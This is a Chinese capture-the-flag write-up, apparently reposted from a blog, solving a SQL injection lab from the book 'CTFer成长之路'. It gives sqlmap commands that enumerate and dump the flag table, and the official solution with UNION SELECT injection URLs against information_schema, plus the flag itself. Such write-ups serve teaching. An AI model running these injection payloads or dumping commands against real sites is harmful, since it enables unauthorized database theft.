《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
[第一章 web入门]SQL注入-1
1.首页
使用sqlmap破解
sqlmap扫描结果。
有结果可知Payload:
id=-8462' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627a71,0x57696b44676d524a54594c47686e45526e48524c746a49566d6f5941487355764262516c7569765a,0x717a787071)-- -
用上得到结果。
qbbzqWikDgmRJTYLGhnERnHRLtjIVmoYAHsUvBbQluivZqzxpq
但这还不是flag,那就继续呗。
但这几个payload都不是,所以这条路走不通。
所以一步一步来。
1.sqlmap爆当前数据库信息
python sqlmap.py -u "http://73ac3d97-f0e7-45b9-af6f-e5539bd33ed3.node3.buuoj.cn/index.php?id=1" --current-db
用sqlmap爆出库名:note
2.sqlmap.列出指定数据库所有的表名
python sqlmap.py -u "http://73ac3d97-f0e7-45b9-af6f-e5539bd33ed3.node3.buuoj.cn/index.php?id=1" -D note --tables
3.sqlmap 列出指定表名的所有列名
python sqlmap.py -u "http://73ac3d97-f0e7-45b9-af6f-e5539bd33ed3.node3.buuoj.cn/index.php?id=1" -D note -T fl4g --columns
4.自然接下来就来到了最激动人心的时刻!
sqlmap 打印输出表名指定列名字段的值数据
python sqlmap.py -u "http://73ac3d97-f0e7-45b9-af6f-e5539bd33ed3.node3.buuoj.cn/index.php?id=1" -D note -T fl4g -C fllllag --dump
哈哈,终于拿到flag
n1book{union_select_is_so_cool}
大功告成。
sqlmap这个工具还是非常方便的,用法的话我推荐这个,Sqlmap使用教程(必备命令)但是了解其中的原理还是十分重要。
原理我推荐这个网络安全-SQL注入原理、攻击及防御
后面看到官方的答案比较正规,而且非常好!于是就拿下来:
微信公众号:Nu1L-Team
《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
../index.php?id=2-1
的结果与 ../index.php?id=2
相同,说明不存在数字型注入
尝试 ../index.php?id=2#27
发现页面无回显,说明存在字符型注入
尝试union注入
../index.php?id=-2%27union%20select%201,2,3%23
尝试获取表名
../index.php?id=-2%27union%20select %201,group_concat(table_name),1%20from%20information_schema.tables %20where%20table_schema=database()%23
通过表名 fl4g,notes
获取字段名:
../index.php?id=-2%27union%20select %201,group_concat(column_name),1%20from%20information_schema.columns %20where%20table_name=%27fl4g%27%23
成功得到字段名fllllag
最后通过字段名 fllllag
获取flag
../index.php?id=-2%27union%20select%201,fllllag,1%20from %20fl4g%23
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/92736.html